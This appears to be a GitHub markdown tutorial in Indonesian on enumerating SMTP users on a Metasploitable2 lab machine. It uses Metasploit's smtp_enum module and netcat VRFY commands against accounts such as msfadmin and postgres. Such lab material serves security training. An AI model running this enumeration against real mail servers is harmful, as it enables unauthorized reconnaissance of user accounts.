Skip to content

Latest commit

 

History

History
65 lines (48 loc) · 2.01 KB

Exploit Port 25 SMTP.md

File metadata and controls

65 lines (48 loc) · 2.01 KB

Exploit Port 25 (SMTP)

  • Buka msfconsole di terminal
msfconsole

alt text

  • Cari modul untuk enumerasi user SMTP
search smtp_enum

alt text

  • Dari hasil pencarian hanya ditemukan 1 modul, jadi langsung kita gunakan modul tersebut
use 0

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini semua parameter sudah terisi secara default kecuali parameter RHOSTS
show options

alt text

  • Isi parameter RHOST dengan IP metasploitable2
set RHOST <IP_metasploitable2>

alt text

  • Sebelum menjalankan exploit buka terminal baru dan jalankan netcat dengan listen port 25
nc <IP_metasploitable2> 25

alt text

  • Jalankan modul tersebut
run

alt text

  • Setelah netcat terhubung, verifikasi masing-masing user apakah dia terdaftar di SMTP server atau tidak. Jika statusnya reject maka user tersebut tidak terdaftar. Ketikkan quit untuk menghentikan netcat
VRFY mysql
VRFY daemon
VRFY postgresql
VRFY postgres
VRFY msfadmin
quit

alt text

  • Modul berhasil dihentikan setelah netcat ditutup

alt text